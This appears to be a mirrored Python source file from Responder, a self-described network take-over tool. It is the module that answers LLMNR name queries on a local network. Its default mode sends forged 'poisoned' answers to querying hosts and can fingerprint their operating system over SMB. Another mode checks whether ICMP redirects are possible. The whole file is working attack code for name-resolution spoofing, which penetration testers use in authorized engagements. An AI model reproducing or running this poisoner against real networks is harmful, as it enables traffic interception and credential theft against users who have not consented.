mirror of
https://github.com/lgandx/Responder.git
synced 2025-12-07 13:11:29 +00:00
75 lines
2.7 KiB
Python
75 lines
2.7 KiB
Python
#!/usr/bin/env python
|
|
# This file is part of Responder, a network take-over set of tools
|
|
# created and maintained by Laurent Gaffie.
|
|
# email: laurent.gaffie@gmail.com
|
|
# This program is free software: you can redistribute it and/or modify
|
|
# it under the terms of the GNU General Public License as published by
|
|
# the Free Software Foundation, either version 3 of the License, or
|
|
# (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful,
|
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
# GNU General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
import struct
|
|
import fingerprint
|
|
|
|
from packets import LLMNR_Ans
|
|
from SocketServer import BaseRequestHandler
|
|
from utils import *
|
|
|
|
|
|
def Parse_LLMNR_Name(data):
|
|
NameLen = struct.unpack('>B',data[12])[0]
|
|
return data[13:13+NameLen]
|
|
|
|
|
|
def IsICMPRedirectPlausible(IP):
|
|
dnsip = []
|
|
for line in file('/etc/resolv.conf', 'r'):
|
|
ip = line.split()
|
|
if len(ip) < 2:
|
|
continue
|
|
elif ip[0] == 'nameserver':
|
|
dnsip.extend(ip[1:])
|
|
for x in dnsip:
|
|
if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
|
|
print color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5)
|
|
print color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5)
|
|
print color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5)
|
|
|
|
if settings.Config.AnalyzeMode:
|
|
IsICMPRedirectPlausible(settings.Config.Bind_To)
|
|
|
|
|
|
class LLMNR(BaseRequestHandler): # LLMNR Server class
|
|
def handle(self):
|
|
data, soc = self.request
|
|
Name = Parse_LLMNR_Name(data)
|
|
|
|
# Break out if we don't want to respond to this host
|
|
if RespondToThisHost(self.client_address[0], Name) is not True:
|
|
return None
|
|
|
|
if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
|
|
Finger = None
|
|
if settings.Config.Finger_On_Off:
|
|
Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
|
|
|
|
if settings.Config.AnalyzeMode:
|
|
LineHeader = "[Analyze mode: LLMNR]"
|
|
print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
|
|
else: # Poisoning Mode
|
|
Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
|
|
Buffer.calculate()
|
|
soc.sendto(str(Buffer), self.client_address)
|
|
LineHeader = "[*] [LLMNR]"
|
|
print color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1)
|
|
|
|
if Finger is not None:
|
|
print text("[FINGER] OS Version : %s" % color(Finger[0], 3))
|
|
print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
|